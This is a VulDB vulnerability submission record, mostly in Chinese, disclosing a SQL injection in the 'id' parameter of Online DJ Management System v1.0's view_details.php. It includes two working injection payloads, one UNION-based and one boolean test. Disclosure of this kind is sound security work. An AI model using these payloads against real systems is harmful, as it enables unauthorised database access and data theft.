提交 #149048: Online DJ Management System v1.0 /odjms/admin/inquiries/view_details.php GET parameter id exists SQL injection vulnerability信息

标题Online DJ Management System v1.0 /odjms/admin/inquiries/view_details.php GET parameter id exists SQL injection vulnerability
描述An issue was discovered in Online DJ Management System v1.0. There is a SQL injection that can directly issue instructions to the background database system via /odjms/admin/inquiries/view_details.php?id. Payload1:id=-1' union all select null,null,null,null,concat(0x66676869,0x515253),null,null-- - Payload2:id=1' and 6=6 AND 'x'='x
来源⚠️ https://github.com/yoyoyoyoyohane/bug_report/blob/main/SQLi-1.md
用户
 yohane (UID 45724)
提交2023-04-26 12時58分 (3 年前)
管理2023-04-28 13時19分 (2 days later)
状态已接受
VulDB条目227647 [SourceCodester Online DJ Management System 1.0 GET Parameter view_details.php 标识符 SQL注入]
积分19

上一步一览下一步

Do you need the next level of professionalism?

Upgrade your account now!